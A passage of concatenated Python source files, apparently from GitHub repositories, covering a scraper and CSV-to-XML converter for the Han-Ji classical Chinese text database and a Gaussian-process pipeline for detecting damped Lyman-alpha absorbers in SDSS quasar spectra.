logging.info("Remove the new lines added by the page dividers, connect the paragraphs before and after the new lines.")
def connect_the_borken_lines(self):
'''
Remove the new lines added by the page dividers, connect the paragraphs before and after the new lines.
This method must be run after the self.strip_all_irrelevant_tags.
TODO: fix the borken new lines in the quoted paragraphs
'''
# loop over body in flat_bodies:
for i,item in enumerate(self.flat_bodies):
# the item here is a bs4 object, so we need to convert it to a string
string_item = str(item)
# and then, substitute the regex pattern in the html source code in the item
updated_string_item = re.sub(
r'<\/div>([^\w]|\n)*?<div style="text-indent:0em;padding-left:0em;">',
r"",
string_item
)
# and then, we need to update the variable, item (with regex substituted), back into the flat_bodies list.
# Note that the updated_string_item has to be converted to bs4 object
self.flat_bodies[i] = BeautifulSoup(updated_string_item, "lxml")
def write_htmls(self, path='data/', html_cutoff=False):
'''writing all htmls in flat_bodies to the folder data/
Args:
path (str) : the path to the folder you want to write htmls files
html_cutoff (bool) : whether or not you want to cut off irrelevant contents in Han-Ji webpage
'''
try:
os.makedirs(path)
except OSError:
pass
for i,soup in enumerate(self.flat_bodies):
filename = os.path.join(path, '{}_{}.html'.format(
self.bookname, str(i).zfill(4)))
with open(filename, 'w', encoding='utf-8') as file:
if html_cutoff==True:
file.write( self._pretty_html(soup) )
else:
file.write(str(soup))
def load_htmls(self, path='data/', html_cutoff=False):
'''loading all files with filename = "bookname_*.html" in path data/
'''
self.flat_bodies = []
i = 0
while 1:
filename = os.path.join(path, '{}_{}.html'.format(
self.bookname, str(i).zfill(4)))
if os.path.isfile(filename):
with open(filename, 'r', encoding='utf-8') as file:
file_read = file.read()
try:
soup = BeautifulSoup(file_read, 'lxml')
if html_cutoff==True:
soup = BeautifulSoup( self._pretty_html(soup), "lxml" )
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
soup = BeautifulSoup(file_read, "html5lib")
if html_cutoff==True:
soup = BeautifulSoup( self._pretty_html(soup), "html5lib" )
self.flat_bodies.append( soup )
else:
logging.info("Stop at loading {}.".format(filename))
break
i += 1
logging.info("Total length of the data is {}.".format(len(self.flat_bodies)))
```
#### File: DigitalHumanities/Han-Ji/HanJi_csv2xml.py
```python
import re
import pandas as pd
import argparse
from lxml import etree
def HanJi_csv2xml(df_head, df_passage):
# construct root element
root = etree.Element("lg", type="poem")
# construct header and author
author = etree.SubElement(root, "author")
author.text = "".join([a for a in df_head.author if type(a) == str])
head = etree.SubElement(root, "head")
for header, comment in zip(df_head.passage, df_head.comment):
# add a child element, head, for our XML
child_head = etree.SubElement(head, "l")
child_head.text = header.replace("\u3000", "")
# add a child element, comment in head, for our XML
if type(comment) == str:
child_head_comment = etree.SubElement(child_head, "comment")
child_head_comment.text = comment
# construct main text
for passage, comment in zip(df_passage.passage, df_passage.comment):
# add a child element, passage, for our XML
child_passage = etree.SubElement(root, "l")
child_passage.text = passage
# add a child element, comment, for our XML
child_child_comment = etree.SubElement(child_passage, "comment")
child_child_comment.text = comment if type(comment) == str else ""
return root
def main(args):
filename_passage = args.filename_passage
# use re to scrpate the name of this poem
filename_head = re.sub(r"_(.*?)_", r'_Head_', filename_passage)
filename_XML = re.sub(r".csv", r'.xml', filename_passage)
# loading DataFrames
df_passage = pd.read_csv(filename_passage)
df_head = pd.read_csv(filename_head)
# create etree elemets from csv2xml function
root = HanJi_csv2xml(df_head, df_passage)
# writing xml file
with open(filename_XML, "w", encoding="utf-8") as file:
file.write(
etree.tostring(root, encoding="unicode", pretty_print=True),
)
if __name__ == "__main__":
# argument parser, building flags
parser = argparse.ArgumentParser()
parser.add_argument('--filename_passage', type=str,
help='The filename of passage for Han-ji csv you want to convert to xml.')
args = parser.parse_args()
main(args)
``` |
{
"source": "jibanCat/gp_dla_detection_dr16q_public",
"score": 2
} |
#### File: gp_dla_detection_dr16q_public/CDDF_analysis/solene_dlas.py
```python
import numpy as np
from astropy.io import fits
def solene_eBOSS_cuts(z_qsos: int, zwarning: int, bal_prob: float) -> np.ndarray:
"""
DLA_CAT_SDSS_DR16.fits (Chabanier+21)
*************************************************************************************
Results of the DLA search using the CNN from Parks+18 on the 263,201 QSO spectra from
the SDSS-IV quasar catalog from DR16 (Lyke+20) with
(1) 2 <= Z_QSO <= 6
(2) Z_WARNING !=
SKY (0),
LITTLE_COVERAGE (1),
UNPLUGGED (7),
BAD_TARGET (8) or
NODATA (9).
(3) BAL_PROB = 0
"""
# 1) Z_QSO
ind = (2 <= z_qsos) & (z_qsos <= 6)
# converting decimal ZWARNING to binary
zwarning_b = [format(z, "b") for z in zwarning]
# 2) ZWARNING: filtering based on Solene's condition
solene_filter = [0, 1, 7, 8, 9]
ind_z = np.ones(z_qsos.shape, dtype=np.bool_)
for i,zw in enumerate(zwarning_b):
for b in solene_filter:
fiter_yes = bitget_string(zw, b)
if fiter_yes:
ind_z[i] = False
break
# 3) BAL prob
ind_bal = (bal_prob == 0)
ind = ind & ind_z & ind_bal
return ind
def bitget_string(z: str, bit: int):
"""
get the bit value at position bit:int, assume it's binary.
"""
if bit >= len(z):
return False
bit_str = z[::-1][bit]
return bool(int(bit_str))
``` |
{
"source": "jibanCat/gpy_dla_detection",
"score": 3
} |
#### File: gpy_dla_detection/examples/download_spectra.py
```python
import os
import numpy as np
from gpy_dla_detection.read_spec import read_spec, retrieve_raw_spec
def download_ho_2020_spectrum(num_quasars: int = 5):
"""
Download first N spectra from Ho-Bird-Garnett (2020) catalogue.
"""
assert num_quasars <= 100
# first 100 from catalogue
plates = np.array([6173, 6177, 4354, 6498, 6177, 4216, 6182, 4296, 7134, 6877, 6177,
4277, 4415, 4216, 4216, 7167, 6177, 4354, 7144, 6177, 7147, 7144,
6511, 6511, 6151, 4216, 4535, 6182, 7034, 6177, 6151, 6498, 7147,
6182, 4354, 6177, 6177, 4354, 6879, 6151, 7144, 4354, 4277, 6879,
6498, 6182, 6879, 4535, 7167, 6879, 4535, 4216, 4216, 4415, 6182,
6511, 6207, 4216, 6177, 4296, 4277, 7034, 4277, 6152, 6172, 7033,
4216, 4277, 6498, 7033, 4415, 4535, 6877, 6170, 4296, 6498, 6513,
6177, 4535, 6151, 4216, 4296, 4296, 7147, 4535, 4296, 7167, 6172,
4535, 6172, 4216, 7147, 4296, 7167, 4216, 7147, 4296, 6177, 6879,
7034])
mjds = np.array([56238, 56268, 55810, 56565, 56268, 55477, 56190, 55499, 56566,
56544, 56268, 55506, 55831, 55477, 55477, 56604, 56268, 55810,
56564, 56268, 56574, 56564, 56540, 56540, 56265, 55477, 55860,
56190, 56564, 56268, 56265, 56565, 56574, 56190, 55810, 56268,
56268, 55810, 56539, 56265, 56564, 55810, 55506, 56539, 56565,
56190, 56539, 55860, 56604, 56539, 55860, 55477, 55477, 55831,
56190, 56540, 56239, 55477, 56268, 55499, 55506, 56564, 55506,
56164, 56269, 56565, 55477, 55506, 56565, 56565, 55831, 55860,
56544, 56240, 55499, 56565, 56543, 56268, 55860, 56265, 55477,
55499, 55499, 56574, 55860, 55499, 56604, 56269, 55860, 56269,
55477, 56574, 55499, 56604, 55477, 56574, 55499, 56268, 56539,
56564])
fiber_ids = np.array([528, 595, 646, 177, 608, 312, 652, 364, 594, 564, 648, 896, 554,
302, 292, 290, 384, 686, 752, 640, 860, 266, 92, 86, 88, 732,
680, 342, 358, 386, 936, 844, 171, 338, 702, 584, 393, 709, 439,
78, 221, 700, 872, 580, 838, 326, 436, 302, 259, 427, 361, 718,
276, 466, 642, 114, 134, 724, 360, 386, 862, 657, 106, 4, 643,
2, 290, 152, 157, 14, 580, 315, 440, 573, 390, 158, 892, 366,
316, 954, 280, 656, 630, 138, 734, 382, 796, 628, 304, 342, 756,
889, 398, 238, 248, 900, 392, 656, 405, 647])
for plate, mjd, fiber_id in zip(
plates[:num_quasars], mjds[:num_quasars], fiber_ids[:num_quasars]
):
filename = "spec-{}-{}-{}.fits".format(plate, mjd, str(fiber_id).zfill(4))
print(filename)
if not os.path.exists(filename):
retrieve_raw_spec(plate, mjd, fiber_id) # the spectrum at paper
```
#### File: gpy_dla_detection/gpy_dla_detection/bayesian_model_selection.py
```python
from typing import List, Tuple, Union
from itertools import chain
import numpy as np
from scipy.special import logsumexp
from .null_gp import NullGP
from .dla_gp import DLAGP
from .subdla_gp import SubDLAGP
class BayesModelSelect:
"""
Bayesian model selection:
p(M | D) = P(M) * P(D | M) / ∑_i( P(M_i) * P(D | M_i) )
which reads:
model posterior = model prior * model evidence
/ (sum of the model posteriors of all possible models)
:attr model_list: a List of models we want to compute in Bayesian model selection.
:attr all_max_dlas: a List of integers indicates number of DLAs to be computed
for each model in the List. 0 for no DLA, which means NullGP, for max_dlas > 0,
model evidences will be calculated from .dla_gp.DLAGP.log_model_evidences(max_dlas).
:attr dla_model_ind: an integer indicates the index of DLA model in the model_list. This
means all other models within model_list will be considered to be
Default is 2.
"""
def __init__(
self, all_max_dlas: List[int] = [0, 1, 4], dla_model_ind: int = 2,
):
# a list of models, all have a base class of NullGP
self.all_max_dlas = all_max_dlas
self.dla_model_ind = dla_model_ind
def model_selection(
self, model_list: List[Union[NullGP, SubDLAGP, DLAGP]], z_qso: float
) -> np.ndarray:
"""
Calculate the log model evidences and priors for each model
in the model_list.
Default assumption is [null model, subDLA model, DLA model].
And always assume the first model is null model and the last one is DLA model.
"""
assert ~isinstance(model_list[0], DLAGP)
assert isinstance(model_list[-1], DLAGP)
assert isinstance(model_list[-1], NullGP)
assert len(model_list) > self.dla_model_ind
log_posteriors = []
log_priors = []
log_likelihoods = []
# prepare the model priors first, so we can get the null model prior
for i, num_dlas in enumerate(self.all_max_dlas):
# skip null model prior
if num_dlas == 0:
log_priors.append([np.nan])
continue
# model priors
log_priors_dla = model_list[i].log_priors(z_qso, num_dlas)
log_priors.append(log_priors_dla)
# null model prior is (1 - other model priors)
log_priors = np.array(list(chain(*log_priors)))
log_priors[0] = np.log(1 - np.exp(logsumexp(log_priors[1:])))
# calculating model evidences
# [Prior] the indexing part of priors is tricky. Do the elementwise addition instead!
for i, num_dlas in enumerate(self.all_max_dlas):
# if this is null model
if num_dlas == 0:
# model evidence
log_likelihood_no_dla = model_list[i].log_model_evidence()
log_likelihoods.append([log_likelihood_no_dla])
# if this is for DLA model or subDLA model
else:
# model evidence
log_likelihoods_dla = model_list[i].log_model_evidences(num_dlas)
log_likelihoods.append(log_likelihoods_dla)
# flatten the nested list : this is due to each element
log_likelihoods = np.array(list(chain(*log_likelihoods)))
# [Prior] elementwise addition
log_posteriors = log_likelihoods + log_priors
# [Prior] make sure prior assignment was correct
assert np.abs((log_likelihoods[-1] + log_priors[-1]) - log_posteriors[-1]) < 1e-4
self.log_priors = log_priors
self.log_likelihoods = log_likelihoods
self.log_posteriors = log_posteriors
return log_posteriors
@property
def dla_model_posterior_ind(self):
"""
Find the ind for DLA model posteriors in the log_posteriors array.
Default is [no DLA, subDLA, 1 DLA, 2 DLA, 3 DLA, 4 DLA],
corresponding to all_max_dlas = [0, 1, 4].
"""
ind = np.zeros((self.log_posteriors.shape[0],), dtype=np.bool_)
ind[-self.all_max_dlas[self.dla_model_ind] :] = True
self._dla_model_posterior_ind = ind
return self._dla_model_posterior_ind
@property
def model_posteriors(self):
sum_log_posteriors = logsumexp(self.log_posteriors)
return np.exp(self.log_posteriors - sum_log_posteriors)
@property
def model_evidences(self):
sum_log_evidences = logsumexp(self.log_likelihoods)
return np.exp(self.log_likelihoods - sum_log_evidences)
@property
def model_priors(self):
sum_log_priors = logsumexp(self.log_priors)
return np.exp(self.log_priors - sum_log_priors)
@property
def p_dla(self):
model_posteriors = self.model_posteriors
self._p_dla = np.sum(model_posteriors[self.dla_model_posterior_ind])
return self._p_dla
@property
def p_no_dla(self):
return 1 - self.p_dla
```
#### File: gpy_dla_detection/gpy_dla_detection/dla_samples.py
```python
import numpy as np
import h5py
from .set_parameters import Parameters
from .model_priors import PriorCatalog
class DLASamples:
"""
A class to generate and store the QMC samples for DLAs:
theta = (z_dla, logNHI) = (redshift of DLA, column density of DLA)
:attr offset_samples: used for z_dla samples
:attr log_nhi_samples: log_nhi samples
"""
def __init__(self, params: Parameters, prior: PriorCatalog):
self.params = params
self.prior = prior
# extract data-driven prior paramters
self.num_dla_samples = params.num_dla_samples
self.uniform_min_log_nhi = params.uniform_min_log_nhi
self.uniform_max_log_nhi = params.uniform_max_log_nhi
self.fit_min_log_nhi = params.fit_min_log_nhi
self.fit_max_log_nhi = params.fit_max_log_nhi
self.alpha = params.alpha
def log_nhi_prior(self):
NotImplementedError
def z_dla_prior(self):
NotImplementedError
@property
def offset_samples(self):
NotImplementedError
@property
def log_nhi_samples(self):
NotImplementedError
@property
def nhi_samples(self):
NotImplementedError
class DLASamplesMAT(DLASamples):
"""
Load DLA samples from .mat file, which is generated from
Roman's generate_dla_samples.m.
"""
def __init__(
self,
params: Parameters,
prior: PriorCatalog,
dla_samples_file: str = "dla_samples_a03.mat",
):
super().__init__(params, prior)
dla_samples = h5py.File(dla_samples_file, "r")
assert self.alpha == dla_samples["alpha"][0, 0]
assert self.uniform_min_log_nhi == dla_samples["uniform_min_log_nhi"][0, 0]
self._offset_samples = dla_samples["offset_samples"][:, 0]
self._log_nhi_samples = dla_samples["log_nhi_samples"][:, 0]
self._nhi_samples = dla_samples["nhi_samples"][:, 0]
@property
def offset_samples(self) -> np.ndarray:
return self._offset_samples
@property
def log_nhi_samples(self) -> np.ndarray:
return self._log_nhi_samples
@property
def nhi_samples(self) -> np.ndarray:
return self._nhi_samples
def sample_z_dlas(self, wavelengths: np.ndarray, z_qso: float) -> np.ndarray:
sample_z_dlas = (
self.params.min_z_dla(wavelengths, z_qso)
+ (
self.params.max_z_dla(wavelengths, z_qso)
- self.params.min_z_dla(wavelengths, z_qso)
)
* self._offset_samples
)
return sample_z_dlas
```
#### File: gpy_dla_detection/plottings/plot_raw_spectrum.py
```python
from typing import Optional
import os
import re
import numpy as np
from matplotlib import pyplot as plt
from ..read_spec import read_spec, read_spec_dr14q, file_loader, retrieve_raw_spec
from ..set_parameters import Parameters
def plot_raw_spectrum(filename: str, release: str = 'dr12q', z_qso: Optional[float] = None):
'''
Plot the raw spectrum, the spectrum before normalisation.
:param filename: filename of the fits file. Must follow the convention,
"spec-{:d}-{:d}-{:04d}.fits".format(plate, mjd, fiber_id)
:param release: either dr12q or dr14q
:param z_qso: if known, plot an sub-axis with rest-frame wavelengths.
'''
assert release in ("dr12q", "dr14q")
# must follow the filename rule to extract
plate, mjd, fiber_id = re.findall(
r"spec-([0-9]+)-([0-9]+)-([0-9]+).fits", filename,
)[0]
if not os.path.exists(filename):
retrieve_raw_spec(int(plate), int(mjd), int(fiber_id), release=release)
# to prevent some people might tempt to load fits file
# from other directories, here we re-specify the filename
print("[Warning] file {} not found, re-download the file.".format(filename))
filename = file_loader(int(plate), int(mjd), int(fiber_id))
# read fits file
if release == "dr12q":
wavelengths, flux, noise_variance, pixel_mask = read_spec(filename)
elif release == "dr14q":
wavelengths, flux, noise_variance, pixel_mask = read_spec_dr14q(filename)
else:
raise Exception("must choose between dr12q or dr14q!")
# plotting config
fig, ax = plt.subplots(figsize=(16, 5))
ax.plot(wavelengths, flux, lw=0.25, label=r"$y(\lambda_{obs})$")
ax.plot(wavelengths, noise_variance, lw=0.25, label=r"$\sigma^2(\lambda_{obs})$")
ax.set_xlabel(r" Observed Wavelength [$\AA$]")
ax.set_ylabel(r"Flux [$10^{-17}{erg}/s/{cm}^{2}/\AA$]")
ax.set_title(r"{}".format(filename))
ax.set_ylim( np.quantile(flux, 0.005), np.quantile(flux, 0.995) )
ax.legend()
# [z_qso] plot the rest-frame axis if z_qso known
if z_qso != None:
assert (0 < z_qso) and (z_qso < 99)
ax2 = ax.secondary_xaxis('top', functions=(
lambda x : Parameters.emitted_wavelengths(x, z_qso),
lambda x : Parameters.observed_wavelengths(x, z_qso)))
ax2.set_xlabel(r"Rest Wavelength [$\AA$]")
```
#### File: gpy_dla_detection/gpy_dla_detection/set_parameters.py
```python
import numpy as np
class Parameters:
# physical constants
lya_wavelength: float = 1215.6701 # Lyman alpha transition wavelength Å
lyb_wavelength: float = 1025.7223 # Lyman beta transition wavelength Å
lyman_limit: float = 911.7633 # Lyman limit wavelength Å
speed_of_light: float = 299792458.0 # speed of light m s⁻¹
def __init__(
self,
# file loading parameters
loading_min_lambda: float = 910.0, # range of rest wavelengths to load Å
loading_max_lambda: float = 1217.0,
# preprocessing parameters
z_qso_cut: float = 2.15, # filter out QSOs with z less than this threshold
min_num_pixels: int = 200, # minimum number of non-masked pixels
# normalization parameters
normalization_min_lambda: float = 1310.0, # range of rest wavelengths to use Å
normalization_max_lambda: float = 1325.0, # for flux normalization
# null model parameters
min_lambda: float = 911.75, # range of rest wavelengths to Å
max_lambda: float = 1215.75, # model
dlambda: float = 0.25, # separation of wavelength grid Å
k: int = 20, # rank of non-diagonal contribution
max_noise_variance: float = 3.0
** 2, # maximum pixel noise allowed during model training
# optimization parameters
initial_c_0: float = 0.1, # initial guess for c₀
initial_tau_0: float = 0.0023, # initial guess for τ₀
initial_beta: float = 3.65, # initial guess for β
minFunc_options: dict = { # optimization options for model fitting
"MaxIter": 2000,
"MaxFunEvals": 4000,
},
# DLA model parameters: parameter samples
num_dla_samples: int = 10000, # number of parameter samples
alpha: float = 0.97, # weight of KDE component in mixture
uniform_min_log_nhi: float = 20.0, # range of column density samples [cm⁻²]
uniform_max_log_nhi: float = 23.0, # from uniform distribution
fit_min_log_nhi: float = 20.0, # range of column density samples [cm⁻²]
fit_max_log_nhi: float = 22.0, # from fit to log PDF
# model prior parameters
prior_z_qso_increase: float = 30000.0, # use QSOs with z < (z_QSO + x) for prior
# instrumental broadening parameters
width: int = 3, # width of Gaussian broadening (# pixels)
pixel_spacing: float = 1e-4, # wavelength spacing of pixels in dex
# DLA model parameters: absorber range and model
num_lines: int = 3, # number of members of the Lyman series to use
max_z_cut: float = 3000.0, # max z_DLA = z_QSO - max_z_cut
min_z_cut: float = 3000.0, # min z_DLA = z_Ly∞ + min_z_cut
# Lyman-series array: for modelling the forests of Lyman series
num_forest_lines: int = 31,
):
self.loading_min_lambda = loading_min_lambda
self.loading_max_lambda = loading_max_lambda
self.z_qso_cut = z_qso_cut
self.min_num_pixels = min_num_pixels
self.normalization_min_lambda = normalization_min_lambda
self.normalization_max_lambda = normalization_max_lambda
self.min_lambda = min_lambda
self.max_lambda = max_lambda
self.dlambda = dlambda
self.k = k
self.max_noise_variance = max_noise_variance
self.initial_c_0 = initial_c_0
self.initial_tau_0 = initial_tau_0
self.initial_beta = initial_beta
self.minFunc_options = minFunc_options
self.num_dla_samples = num_dla_samples
self.alpha = alpha
self.uniform_min_log_nhi = uniform_min_log_nhi
self.uniform_max_log_nhi = uniform_max_log_nhi
self.fit_min_log_nhi = fit_min_log_nhi
self.fit_max_log_nhi = fit_max_log_nhi
self.prior_z_qso_increase = self.kms_to_z(prior_z_qso_increase)
self.width = width
self.pixel_spacing = pixel_spacing
self.num_lines = num_lines
self.max_z_cut = self.kms_to_z(max_z_cut)
self.min_z_cut = self.kms_to_z(min_z_cut)
self.num_forest_lines = num_forest_lines
@classmethod
def kms_to_z(cls, kms: float) -> float:
"""
converts relative velocity in km s^-1 to redshift difference
"""
return (kms * 1000) / cls.speed_of_light
@staticmethod
def emitted_wavelengths(observed_wavelengths: np.ndarray, z: float) -> np.ndarray:
"""
utility functions for redshifting
"""
return observed_wavelengths / (1 + z)
@staticmethod
def observed_wavelengths(emitted_wavelengths: np.ndarray, z: float) -> np.ndarray:
"""
utility functions for redshifting
"""
return emitted_wavelengths * (1 + z)
def max_z_dla(self, wavelengths: np.ndarray, z_qso: float) -> float:
"""
determines maximum z_DLA to search
We only consider z_dla within the modelling range.
"""
rest_wavelengths = self.emitted_wavelengths(wavelengths, z_qso)
ind = (rest_wavelengths >= self.min_lambda) & (
rest_wavelengths <= self.max_lambda
)
return (np.max(wavelengths[ind]) / self.lya_wavelength - 1) - self.max_z_cut
def min_z_dla(self, wavelengths: np.ndarray, z_qso: float) -> float:
"""
determines minimum z_DLA to search
We only consider z_dla within the modelling range.
"""
rest_wavelengths = self.emitted_wavelengths(wavelengths, z_qso)
ind = (rest_wavelengths >= self.min_lambda) & (
rest_wavelengths <= self.max_lambda
)
return np.max(
[
np.min(wavelengths[ind]) / self.lya_wavelength - 1,
self.observed_wavelengths(self.lyman_limit, z_qso) / self.lya_wavelength
- 1
+ self.min_z_cut,
]
)
def __repr__(self):
"""
print out the default pipeline parameters
"""
return str(self.__dict__)
```
#### File: gpy_dla_detection/gpy_dla_detection/subdla_gp.py
```python
from typing import Tuple, Optional
import numpy as np
import h5py
from .set_parameters import Parameters
from .model_priors import PriorCatalog
from .null_gp import NullGP
from .voigt import voigt_absorption
# this could be replaced to SubDLASamples in the future;
# I import this is for the convenient of my autocomplete
from .subdla_samples import SubDLASamplesMAT
class SubDLAGP(NullGP):
"""
SubDLA GP model for QSO emission + DLA intervening:
p(y | λ, σ², M, ω, c₀, τ₀, β, τ_kim, β_kim, z_dla, logNHI)
additional two parameters (z_dla, logNHI) will control the position
and the strength of the absorption intervening on the QSO emission.
SubDLA parameter prior : logNHI ~ U(19.5, 20)
Since the integration is not tractable, so we use QMC to approximate
the model evidence.
How many QMC samples will be defined in Parameters and DLASamples.
:param rest_wavelengths: λ, the range of λ you model your GP on QSO emission
:param mu: mu, the mean model of the GP.
:param M: M, the low rank decomposition of the covariance kernel: K = MM^T.
:param log_omega: log ω, the pixel-wise noise of the model. Used to model absorption noise.
:param log_c_0: log c₀, the constant in the Lyman forest noise model,
Lyman forest noise := s(z) = 1 - exp(-effective_optical_depth) + c_0.
:param log_tau_0: log τ₀, the scale factor of effective optical depth in the absorption noise,
effective_optical_depth := ∑ τ₀ fi1 λi1 / ( f21 λ21 ) * ( 1 + z_i1 )^β
:param log_beta: log β, the exponent of the effective optical depth in the absorption noise.
:param prev_tau_0: τ_kim, the scale factor of effective optical depth used in mean-flux suppression.
:param prev_beta: β_kim, the exponent of the effective optical depth used in mean-flux suppression.
Future: MCMC embedded in the class as an instance method.
"""
def __init__(
self,
params: Parameters,
prior: PriorCatalog,
dla_samples: SubDLASamplesMAT,
rest_wavelengths: np.ndarray,
mu: np.ndarray,
M: np.ndarray,
log_omega: np.ndarray,
log_c_0: float,
log_tau_0: float,
log_beta: float,
prev_tau_0: float = 0.0023,
prev_beta: float = 3.65,
min_z_separation: float = 3000.0,
broadening: bool = True,
):
super().__init__(
params,
prior,
rest_wavelengths,
mu,
M,
log_omega,
log_c_0,
log_tau_0,
log_beta,
prev_tau_0,
prev_beta,
)
self.min_z_separation = self.params.kms_to_z(min_z_separation)
self.dla_samples = dla_samples
self.broadening = broadening
def log_model_evidences(self, max_dlas: int = 1) -> np.ndarray:
"""
marginalize out the DLA parameters, {(z_dla_i, logNHI_i)}_{i=1}^k_dlas,
and return an array of log_model_evidences for 1:k DLA models
Note: we provide an integration method here to reproduce the functionality
in Ho-Bird-Garnett's code, but we encourage users to improve this sampling
scheme to be more efficient with another external script by calling
self.sample_log_likelihood_k_dlas directly.
:param max_dlas: the number of DLAs we want to marginalise
:return: [P(D | 1 DLA), ..., P(D | k DLAs)]
"""
# allocate the final log model evidences
log_likelihoods_dla = np.empty((max_dlas,))
log_likelihoods_dla[:] = np.nan
# base inds to store the QMC samples to be resampled according
# the prior, which is the posterior of the previous run.
base_sample_inds = np.zeros(
(max_dlas - 1, self.params.num_dla_samples,), dtype=np.int32
)
# sorry, let me follow the convention of the MATLAB code here
# could be changed to (max_dlas, num_dla_samples) in the future.
sample_log_likelihoods = np.empty((self.params.num_dla_samples, max_dlas))
sample_log_likelihoods[:] = np.nan
# prepare z_dla samples
sample_z_dlas = self.dla_samples.sample_z_lls(
self.this_wavelengths, self.z_qso
)
# compute probabilities under DLA model for each of the sampled
# (normalized offset, log(N HI)) pairs
for num_dlas in range(max_dlas): # count from zero to max_dlas - 1
# [Need to be parallelized]
# Roman's code has this part to be parallelized.
for i in range(self.params.num_dla_samples):
# query the 1st DLA parameter {z_dla, logNHI}_{i=1} from the
# given DLA samples.
z_dlas = np.array([sample_z_dlas[i]])
log_nhis = np.array([self.dla_samples.log_nhi_samples[i]])
nhis = np.array([self.dla_samples.nhi_samples[i]])
# query the 2:k DLA parameters {z_dla, logNHI}_{i=2}^k_dlas
if num_dlas > 0:
base_ind = base_sample_inds[:num_dlas, i]
z_dlas_2_k = sample_z_dlas[base_ind]
log_nhis_2_k = self.dla_samples.log_nhi_samples[base_ind]
nhis_2_k = self.dla_samples.nhi_samples[base_ind]
# append to samples to be applied on calculating the log likelihood
z_dlas = np.append(z_dlas, z_dlas_2_k)
log_nhis = np.append(log_nhis, log_nhis_2_k)
nhis = np.append(nhis, nhis_2_k)
del z_dlas_2_k, log_nhis_2_k, nhis_2_k
# store the sample log likelihoods conditioned on k-DLAs
sample_log_likelihoods[i, num_dlas] = self.sample_log_likelihood_k_dlas(
z_dlas, nhis
) - np.log(
self.params.num_dla_samples
) # additional occams razor
# check if any pair of dlas in this sample is too close this has to
# happen outside the parfor because "continue" slows things down
# dramatically
if num_dlas > 0:
# all_z_dlas : (num_dlas, num_dla_samples)
ind = base_sample_inds[:num_dlas, :] # (num_dlas - 1, num_dla_samples)
all_z_dlas = np.concatenate(
[sample_z_dlas[None, :], sample_z_dlas[ind]], axis=0
) # (num_dlas, num_dla_samples)
ind = np.any(
np.diff(np.sort(all_z_dlas, axis=0), axis=0)
< self.min_z_separation,
axis=0,
)
sample_log_likelihoods[ind, num_dlas] = np.nan
# to prevent numerical underflow
max_log_likelihood = np.nanmax(sample_log_likelihoods[:, num_dlas])
sample_probabilities = np.exp(
sample_log_likelihoods[:, num_dlas] - max_log_likelihood
)
log_likelihoods_dla[num_dlas] = (
max_log_likelihood
+ np.log(np.nanmean(sample_probabilities))
- np.log(self.params.num_dla_samples) * num_dlas
) # occams razor for more DLA parameters
# no needs for re-sample the QMC samples for the last run
if (num_dlas + 1) == max_dlas:
break
# if p(D | z_QSO, k DLA) is NaN, then
# finish the loop.
# It's usually because p(D | z_QSO, no DLA) is very high, so
# the higher order DLA model likelihoods already underflowed
if np.isnan(log_likelihoods_dla[num_dlas]):
print(
"Finish the loop earlier because NaN value in log p(D | z_QSO, {} DLAs)".format(
num_dlas
)
)
break
# avoid nan values in the randsample weights
nanind = np.isnan(sample_probabilities)
W = sample_probabilities
W[nanind] = 0.0
base_sample_inds[num_dlas, :] = np.random.choice(
np.arange(self.params.num_dla_samples).astype(np.int32),
size=self.params.num_dla_samples,
replace=True,
p=W / W.sum(),
)
# store sample likelihoods for MAP value calculation
# this could cause troubles for parallelization in the future
self.sample_log_likelihoods = sample_log_likelihoods
return log_likelihoods_dla
def sample_log_likelihood_k_dlas(
self, z_dlas: np.ndarray, nhis: np.ndarray
) -> float:
"""
Compute the log likelihood of k DLAs within a quasar spectrum:
p(y | λ, σ², M, ω, c₀, τ₀, β, τ_kim, β_kim, {z_dla, logNHI}_{i=1}^k)
:param z_dlas: an array of z_dlas you want to condition on
:param nhis: an array of nhis you want to condition on
"""
assert len(z_dlas) == len(nhis)
dla_mu, dla_M, dla_omega2 = self.this_dla_gp(z_dlas, nhis)
sample_log_likelihood = self.log_mvnpdf_low_rank(
self.y, dla_mu, dla_M, dla_omega2 + self.v
)
return sample_log_likelihood
def this_dla_gp(
self, z_dlas: np.ndarray, nhis: np.ndarray
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Compute the DLA GP model with k intervening DLA profiles onto
the mean and covariance.
:param z_dlas: (k_dlas, ), the redshifts of intervening DLAs
:param nhis: (k_dlas, ), the column densities of intervening DLAs
:return: (dla_mu, dla_M, dla_omega2)
:return dla_mu: (n_points, ), the GP mean model with k_dlas DLAs intervening.
:return dla_M: (n_points, k), the GP covariance with k_dlas DLAs intervening.
:return dla_omega2: (n_points), the absorption noise with k_dlas DLAs intervening.S
Note: the number of Voigt profile lines is controlled by self.params : Parameters,
I prefer to not to allow users to change from the function arguments since that
would easily cause inconsistent within a pipeline. But if a user want to change
the num_lines, they can change via changing the instance attr of the self.params:Parameters
like:
self.params.num_lines = <the number of lines preferred to be used>
This would happen when a user want to know whether the result would converge with increasing
number of lines.
"""
assert len(z_dlas) == len(nhis)
k_dlas = len(z_dlas)
# to retain only unmasked pixels from computed absorption profile
mask_ind = ~self.pixel_mask[self.ind_unmasked]
# [broadening] use the padded wavelengths for convolution;
# otherwise, should use unmasked wavelengths.
if self.broadening:
wavelengths = self.padded_wavelengths
else:
wavelengths = self.unmasked_wavelengths
# absorption corresponding to this sample
absorption = voigt_absorption(
wavelengths,
z_dla=z_dlas[0],
nhi=nhis[0],
num_lines=self.params.num_lines,
broadening=self.broadening, # the switch for instrumental broadening controlled by instance attr
)
# absorption corresponding to other DLAs in multiple DLA samples
for j in range(1, k_dlas):
absorption = absorption * voigt_absorption(
wavelengths,
z_dla=z_dlas[j],
nhi=nhis[j],
num_lines=self.params.num_lines,
broadening=self.broadening, # the switch for instrumental broadening controlled by instance attr
)
absorption = absorption[mask_ind]
assert len(absorption) == len(self.this_mu)
dla_mu = self.this_mu * absorption
dla_M = self.this_M * absorption[:, None]
dla_omega2 = self.this_omega2 * absorption ** 2
return dla_mu, dla_M, dla_omega2
def log_priors(self, z_qso: float, max_dlas: int) -> float:
"""
get the model prior of null model, this is defined to be:
P(k DLA | zQSO) = P(at least k DLAs | zQSO) - P(at least (k + 1) DLAs | zQSO),
where
P(at least 1 DLA | zQSO) = M / N
M : number of DLAs below this zQSO
N : number of quasars below this zQSO
and
P(at least k DLA | zQSO) = (M / N)^k
For subDLAs, we need to adjust the model prior with the ratio
of the normalization factors:
P(at least 1 subDLA | zQSO) = P(at least 1 DLA | zQSO)
